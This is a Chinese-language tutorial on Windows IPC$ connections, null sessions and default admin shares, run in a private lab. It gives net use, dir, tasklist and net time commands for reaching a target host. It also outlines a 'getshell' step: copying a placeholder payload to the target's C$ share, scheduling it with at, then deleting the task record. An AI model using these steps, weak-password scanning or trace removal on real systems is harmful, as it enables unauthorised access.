一,IPC
IPC(Internet Process Connection)共享命名管道的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限。
二,ipc$与空连接,139,445端口,默认共享的关系
1,ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2,ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.
3,ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)
三,使用
攻击机:192.168.135.1
目标机:192.168.135.129
建立IPC$连接
net use \\192.168.135.129\ipc$ "shy" /user:shy
查看连接是否建立
net use
如果是下图情况,则有可能是该用户已经登录了。
因为microsoft windows network 不允许一个用户使用一个以上用户名与服务器或共享资源的多重连接.
列出目标机中的文件
dir \\192.168.138.134\c$
dir \\192.168.138.134\admin$
列出目标机上的进程
tasklist /s 192.168.138.135 /u administrator /p shy
取消建立的连接
net use * /del /y
四,getshell
计划任务getshell
1,使用net time确定目标机时间
net time \\192.168.138.135
2,使用copy将payload复制到目标机中
copy calc.bat \\192.168.138.135\c$
3,使用at定时启动payload文件
4,删除使用at创建计划任务的记录